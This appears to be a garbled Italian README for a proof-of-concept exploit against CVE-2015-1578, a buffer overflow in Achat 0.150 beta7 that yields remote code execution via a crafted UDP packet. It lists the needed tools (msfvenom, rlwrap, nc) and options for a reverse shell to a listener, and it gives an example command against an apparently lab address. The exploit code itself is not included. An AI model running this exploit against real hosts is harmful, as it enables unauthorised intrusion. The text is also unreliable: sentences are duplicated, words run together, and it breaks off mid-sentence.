
Questo è un exploit proof-of-concept per CVE-2015-1578, una vulnerabilità di buffer overflow in Achat 0.150 beta7 su Windows. Lo sfruttamento porta all'esecuzione remota di codice tramite un pacchetto UDP appositamente creato.
Questo è un proof-of-concept exploit per CVE-2015-1578, una vulnerabilità di buffer overflow in Achat 0.150 beta7 su Windows. Lo sfruttamento porta all'esecuzione di codice remoto tramite un pacchetto UDP modificato.
Questo PoC ha lo scopo di servire come esempio pulito, minimo e ben strutturato di sviluppo di exploit. Dimostra:
msfvenommsfvenom (parte del Metasploit Framework)rlwrap (per una migliore usabilità di Netcat)msfvenomrlwrap nc-i <target_ip> Indirizzo IP di destinazione (obbligatorio)
-l, --lhost <listener_ip> IP host locale per la reverse shell (obbligatorio)
-p, --lport <port> Porta locale per la reverse shell (obbligatorio)
--rport <port> Porta UDP remota sulla destinazione (default: 9256)
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
Questo: